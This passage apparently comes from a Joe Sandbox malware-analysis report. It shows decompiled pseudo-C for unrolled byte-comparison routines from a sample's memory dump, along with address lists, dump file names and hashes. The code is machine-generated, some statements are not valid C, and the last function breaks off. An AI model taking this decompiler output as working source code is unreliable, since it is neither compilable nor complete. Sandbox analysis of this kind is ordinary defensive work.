													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x00bc0dc8
0x00bc0dc8
0x00bc0dce
0x00bc0e56
0x00bc0e58
0x00bc0e5a
0x00000000
0x00000000
0x00bc0e60
0x00bc0e66
0x00bc0eed
0x00bc0eef
0x00bc0ef1
0x00000000
0x00000000
0x00bc0ef7
0x00bc0efd
0x00bc0f84
0x00bc0f86
0x00bc0f88
0x00000000
0x00000000
0x00bc0f8e
0x00bc0f94
0x00bc101b
0x00bc101d
0x00bc101f
0x00000000
0x00000000
0x00bc102b
0x00bc10b3
0x00bc10b5
0x00bc10b7
0x00000000
0x00000000
0x00bc10bd
0x00bc10c3
0x00bc114a
0x00bc114c
0x00bc114e
0x00000000
0x00000000
0x00bc1154
0x00bc115a
0x00bc11e1
0x00bc11e3
0x00bc11e5
0x00000000
0x00000000
0x00bc11f3
0x00bc11f5
0x00bc120d
0x00bc1215
0x00bc1217
0x00bc0970
0x00bc0978
0x00bc097a
0x00bc0987
0x00bc0987
0x00000000
0x00bc097a
0x00bc1224
0x00bc096a
0x00000000
0x00000000
0x00000000
0x00000000
0x00bc096a
0x00bc11fe
0x00bc1207
0x00000000
0x00000000
0x00000000
0x00bc1207
0x00bc1167
0x00bc1169
0x00bc1181
0x00bc1189
0x00bc118b
0x00bc11a3
0x00bc11ab
0x00bc11ad
0x00bc11c5
0x00bc11cd
0x00bc11cf
0x00bc11d8
0x00bc11d8
0x00000000
0x00bc11cf
0x00bc11b6
0x00bc11bf
0x00000000
0x00000000
0x00000000
0x00bc11bf
0x00bc1194
0x00bc119d
0x00000000
0x00000000
0x00000000
0x00bc119d
0x00bc1172
0x00bc117b
0x00000000
0x00000000
0x00000000
0x00bc117b
0x00bc10d0
0x00bc10d2
0x00bc10ea
0x00bc10f2
0x00bc10f4
0x00bc110c
0x00bc1114
0x00bc1116
0x00bc112e
0x00bc1136
0x00bc1138
0x00bc1141
0x00bc1141
0x00000000
0x00bc1138
0x00bc111f
0x00bc1128
0x00000000
0x00000000
0x00000000
0x00bc1128
0x00bc10fd
0x00bc1106
0x00000000
0x00000000
0x00000000
0x00bc1106
0x00bc10db
0x00bc10e4
0x00000000
0x00000000
0x00000000
0x00bc10e4
0x00bc1039
0x00bc103b
0x00bc1053
0x00bc105b
0x00bc105d
0x00bc1075
0x00bc107d
0x00bc107f
0x00bc1097
0x00bc109f
0x00bc10a1
0x00bc10aa
0x00bc10aa
0x00000000
0x00bc10a1
0x00bc1088
0x00bc1091
0x00000000
0x00000000
0x00000000
0x00bc1091
0x00bc1066
0x00bc106f
0x00000000
0x00000000
0x00000000
0x00bc106f
0x00bc1044
0x00bc104d
0x00000000
0x00000000
0x00000000
0x00bc104d
0x00bc0fa1
0x00bc0fa3
0x00bc0fbb
0x00bc0fc3
0x00bc0fc5
0x00bc0fdd
0x00bc0fe5
0x00bc0fe7
0x00bc0fff
0x00bc1007
0x00bc1009
0x00bc1012
0x00bc1012
0x00000000
0x00bc1009
0x00bc0ff0
0x00bc0ff9
0x00000000
0x00000000
0x00000000
0x00bc0ff9
0x00bc0fce
0x00bc0fd7
0x00000000
0x00000000
0x00000000
0x00bc0fd7
0x00bc0fac
0x00bc0fb5
0x00000000
0x00000000
0x00000000
0x00bc0fb5
0x00bc0f0a
0x00bc0f0c
0x00bc0f24
0x00bc0f2c
0x00bc0f2e
0x00bc0f46
0x00bc0f4e
0x00bc0f50
0x00bc0f68
0x00bc0f70
0x00bc0f72
0x00bc0f7b
0x00bc0f7b
0x00000000
0x00bc0f72
0x00bc0f59
0x00bc0f62
0x00000000
0x00000000
0x00000000
0x00bc0f62
0x00bc0f37
0x00bc0f40
0x00000000
0x00000000
0x00000000
0x00bc0f40
0x00bc0f15
0x00bc0f1e
0x00000000
0x00000000
0x00000000
0x00bc0f1e
0x00bc0e73
0x00bc0e75
0x00bc0e8d
0x00bc0e95
0x00bc0e97
0x00bc0eaf
0x00bc0eb7
0x00bc0eb9
0x00bc0ed1
0x00bc0ed9
0x00bc0edb
0x00bc0ee4
0x00bc0ee4
0x00000000
0x00bc0edb
0x00bc0ec2
0x00bc0ecb
0x00000000
0x00000000
0x00000000
0x00bc0ecb
0x00bc0ea0
0x00bc0ea9
0x00000000
0x00000000
0x00000000
0x00bc0ea9
0x00bc0e7e
0x00bc0e87
0x00000000
0x00000000
0x00000000
0x00bc0dd4
0x00bc0dd8
0x00bc0ddc
0x00bc0dde
0x00bc0df6
0x00bc0df6
0x00bc0dfe
0x00bc0e00
0x00bc0e18
0x00bc0e18
0x00bc0e20
0x00bc0e22
0x00bc0e3a
0x00bc0e3a
0x00bc0e42
0x00bc0e44
0x00bc0e4d
0x00bc0e4d
0x00000000
0x00bc0e44
0x00bc0e28
0x00bc0e2b
0x00bc0e34
0x00000000
0x00000000
0x00000000
0x00bc0e34
0x00bc0e06
0x00bc0e09
0x00bc0e12
0x00000000
0x00000000
0x00000000
0x00bc0e12
0x00bc0de4
0x00bc0de7
0x00bc0df0
0x00000000
0x00000000
0x00000000
0x00bc0df0
0x00bc0556
0x00bc0556
0x00bc1347

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 692ec8d94ab1b7e3053aeb3147916d33f75640438f8ae15662af4ade3a74d349
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: CFC1B2322150934BDF2D463D8574A3FBBE59AA27B131A0BEDD4B6DB0C5FE20C564DA20

Uniqueness

Uniqueness Score: -1.00%

Function 00BC055E Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BC055E(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x00bc055e
0x00bc055e
0x00bc0564
0x00bc05db
0x00bc05dd
0x00bc05df
0x00000000
0x00000000
0x00bc05e5
0x00bc05eb
0x00bc0672
0x00bc0674
0x00bc0676
0x00000000
0x00000000
0x00bc067c
0x00bc0682
0x00bc0709
0x00bc070b
0x00bc070d
0x00000000
0x00000000
0x00bc0713
0x00bc0719
0x00bc07a0
0x00bc07a2
0x00bc07a4
0x00000000
0x00000000
0x00bc07aa
0x00bc07b0
0x00bc0837
0x00bc0839
0x00bc083b
0x00000000
0x00000000
0x00bc0847
0x00bc08cf
0x00bc08d1
0x00bc08d3
0x00000000
0x00000000
0x00bc08d9
0x00bc08df
0x00bc0966
0x00bc0968
0x00bc096a
0x00bc0978
0x00bc097a
0x00bc0987
0x00bc0987
0x00bc097a
0x00000000
0x00bc096a
0x00bc08ec
0x00bc08ee
0x00bc0906
0x00bc090e
0x00bc0910
0x00bc0928
0x00bc0930
0x00bc0932
0x00bc094a
0x00bc0952
0x00bc0954
0x00bc095d
0x00bc095d
0x00000000
0x00bc0954
0x00bc093b
0x00bc0944
0x00000000
0x00000000
0x00000000
0x00bc0944
0x00bc0919
0x00bc0922
0x00000000
0x00000000
0x00000000
0x00bc0922
0x00bc08f7
0x00bc0900
0x00000000
0x00000000
0x00000000
0x00bc0900
0x00bc0855
0x00bc0857
0x00bc086f
0x00bc0877
0x00bc0879
0x00bc0891
0x00bc0899
0x00bc089b
0x00bc08b3
0x00bc08bb
0x00bc08bd
0x00bc08c6
0x00bc08c6
0x00000000
0x00bc08bd
0x00bc08a4
0x00bc08ad
0x00000000
0x00000000
0x00000000
0x00bc08ad
0x00bc0882
0x00bc088b
0x00000000
0x00000000
0x00000000
0x00bc088b
0x00bc0860
0x00bc0869
0x00000000
0x00000000
0x00000000
0x00bc0869
0x00bc07bd
0x00bc07bf
0x00bc07d7
0x00bc07df
0x00bc07e1
0x00bc07f9
0x00bc0801
0x00bc0803
0x00bc081b
0x00bc0823
0x00bc0825
0x00bc082e
0x00bc082e
0x00000000
0x00bc0825
0x00bc080c
0x00bc0815
0x00000000
0x00000000
0x00000000
0x00bc0815
0x00bc07ea
0x00bc07f3
0x00000000
0x00000000
0x00000000
0x00bc07f3
0x00bc07c8
0x00bc07d1
0x00000000
0x00000000
0x00000000
0x00bc07d1
0x00bc0726
0x00bc0728
0x00bc0740
0x00bc0748
0x00bc074a
0x00bc0762
0x00bc076a
0x00bc076c
0x00bc0784
0x00bc078c
0x00bc078e
0x00bc0797
0x00bc0797
0x00000000
0x00bc078e
0x00bc0775
0x00bc077e
0x00000000
0x00000000
0x00000000
0x00bc077e
0x00bc0753
0x00bc075c
0x00000000
0x00000000
0x00000000
0x00bc075c
0x00bc0731
0x00bc073a
0x00000000
0x00000000
0x00000000
0x00bc073a
0x00bc068f
0x00bc0691
0x00bc06a9
0x00bc06b1
0x00bc06b3
0x00bc06cb
0x00bc06d3
0x00bc06d5
0x00bc06ed
0x00bc06f5
0x00bc06f7
0x00bc0700
0x00bc0700
0x00000000
0x00bc06f7
0x00bc06de
0x00bc06e7
0x00000000
0x00000000
0x00000000
0x00bc06e7
0x00bc06bc
0x00bc06c5
0x00000000
0x00000000
0x00000000
0x00bc06c5
0x00bc069a
0x00bc06a3
0x00000000
0x00000000
0x00000000
0x00bc06a3
0x00bc05f8
0x00bc05fa
0x00bc0612
0x00bc061a
0x00bc061c
0x00bc0634
0x00bc063c
0x00bc063e
0x00bc0656
0x00bc065e
0x00bc0660
0x00bc0669
0x00bc0669
0x00000000
0x00bc0660
0x00bc0647
0x00bc0650
0x00000000
0x00000000
0x00000000
0x00bc0650
0x00bc0625
0x00bc062e
0x00000000
0x00000000
0x00000000
0x00bc062e
0x00bc0603
0x00bc060c
0x00000000
0x00000000
0x00000000
0x00bc0566
0x00bc0566
0x00bc056d
0x00bc056f
0x00bc0583
0x00bc0583
0x00bc058b
0x00bc058d
0x00bc05a1
0x00bc05a1
0x00bc05a9
0x00bc05ab
0x00bc05bf
0x00bc05bf
0x00bc05c7
0x00bc05c9
0x00bc05d2
0x00bc05d2
0x00000000
0x00bc05c9
0x00bc05b1
0x00bc05b4
0x00bc05bd
0x00000000
0x00000000
0x00000000
0x00bc05bd
0x00bc0593
0x00bc0596
0x00bc059f
0x00000000
0x00000000
0x00000000
0x00bc059f
0x00bc0575
0x00bc0578
0x00bc0581
0x00000000
0x00000000
0x00000000
0x00bc0581
0x00bc0556
0x00bc0556
0x00bc1347

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: a76132483e70cfddb2e14a70796fd857fcdc0b753ef194566c5ebe3c3723b29e
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 9CC1B1322151938BDF2D563D8574A3FBBE19AA27B131A07EDD4B6CB0C5FE20D524DA20

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0146 Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BC0146(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
